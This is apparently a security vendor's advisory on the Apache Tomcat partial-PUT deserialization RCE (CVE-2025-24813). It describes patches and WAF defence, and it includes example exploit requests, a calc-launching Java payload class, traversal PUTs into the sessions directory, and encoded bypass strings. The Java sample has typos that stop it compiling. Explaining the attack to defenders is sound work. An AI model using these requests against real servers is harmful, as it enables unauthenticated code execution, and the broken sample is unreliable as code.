Threat Intelligence Report

Get up-to-date information on web application vulnerabilities, attacks, and how to respond.

Back to Threat Intelligence Report

[2025.04 Vulnerability Report] Apache Tomcat RCE Vulnerability (CVE-2025-24813)

[2025.04 Vulnerability Report] Apache Tomcat RCE Vulnerability (CVE-2025-24813)

Apache Tomcat is a Java-based web application server widely used worldwide, and recently discovered a serious path equivalence vulnerability identified as CVE-2025-24813. This vulnerability poses a risk that an attacker can access restricted resources or execute arbitrary code without authentication due to a path validation error in DefaultServlet.

An attacker can bypass authentication through an HTTP request containing a specially crafted path and execute tasks that are normally only available to authenticated users. In particular, it can lead to a remote code execution (RCE) attempt that completely seizes system privileges or executes malicious files, so companies and organizations using Apache Tomcat urgently need to apply the latest security patches.

Our AIWAF product continuously monitors and detects vulnerabilities that may occur in widely used open source-based web servers such as Apache Tomcat in real time, and responds to the vulnerabilities so that preemptive defense is possible based on detection signatures and bypass pattern analysis. We will continue to analyze and update similar path bypass and authentication bypass vulnerabilities in the future.

1. Overview

Apache Tomcat is an open source software under the Apache License Version 2 that provides a servlet container for running Java Server Pages (JSPs) and Java Servlets. This software is widely used as a servlet container in commercial web application servers, and we have analyzed RCE vulnerabilities in this software.

image.png

Source : https://tomcat.apache.org/

2. Attack Type

CVE-2025-24813 stems from the way Tomcat handles partial PUT requests and allows a remote, unauthenticated attacker to perform remote code execution (RCE), view security-sensitive files, and inject content into those files.

  • The attacker sends a PUT request to the server that contains a Base64-encoded serialized Java payload. This payload is designed to trigger an RCE upon deserialization.
    • ex) 
      PUT /uploads/check.txt HTTP/1.1
Host: vulnerabel-server.com
Content-Length: 10

testdata
  • Create Java-based payloads
    • ex) 
      import java.io.IOException;

public calss Exploit{
  static{
    trt{
      Runtime.getRuntime().exec("cmd.exe /c calc.exe");
    } catch (IOException e){
      e.printStackTrace();
    }
  }
}
  • Generate exploit upload packets
    • ex) 
      PUT /uploads/../sessions/attacker.session HTTP/1.1
Host: vulnerable-server.com
Content-Type: application/octet-stream
Content-Length: 1024

<serialized payload data>
    • Apache Tomcat incorrectly treats this file as a legitimate session object due to directory traversal
  • After sending the above request, the attacker sends a GET request with a specially crafted “JSESSIONID” cookie that references the malicious session, causing the server to deserialize the payload and execute arbitrary code.
    • ex) 
      GET /index.jsp HTTP/1.1
Host: vulnerable-server.com
Cookie: JSESSIONID=attacker

3. Response

CVE-2025-24813 is addressed by security patches in Tomcat 9.0.99 and later, 10.1.35 and later, 11.0.3 and later, and we recommend using these versions or later.

For this vulnerability, our WAF will be further analyzed and updated to address attacks via encoded bypass paths such as /..;/, %2e%2e%3b/, ;%2e%2e/, etc.

4. Conclusion

Apache Tomcat, a popular Java-based web application server used worldwide, was recently discovered to contain an RCE vulnerability identified as CVE-2025-24813. The vulnerability is due to a path validation error in the DefaultServlet, which could allow an attacker to access restricted resources or execute arbitrary code without authentication.

By sending an HTTP request with a specially crafted path, an attacker can bypass authentication and execute actions that normally can only be performed by authenticated users. This could lead to remote code execution (RCE) attempts, especially to take full control of a system or execute malicious files, making it urgent for organizations and institutions using Apache Tomcat to apply the latest security patches.

Our AIWAF products are continuously monitoring and detecting vulnerabilities in real-time in widely used open source-based web servers such as Apache Tomcat, and are responding to these vulnerabilities with proactive defenses based on detection signatures and bypass pattern analysis. We will continue to analyze and update our vulnerabilities for similar path bypass and authentication bypass vulnerabilities in the future.

5. References

Scroll Up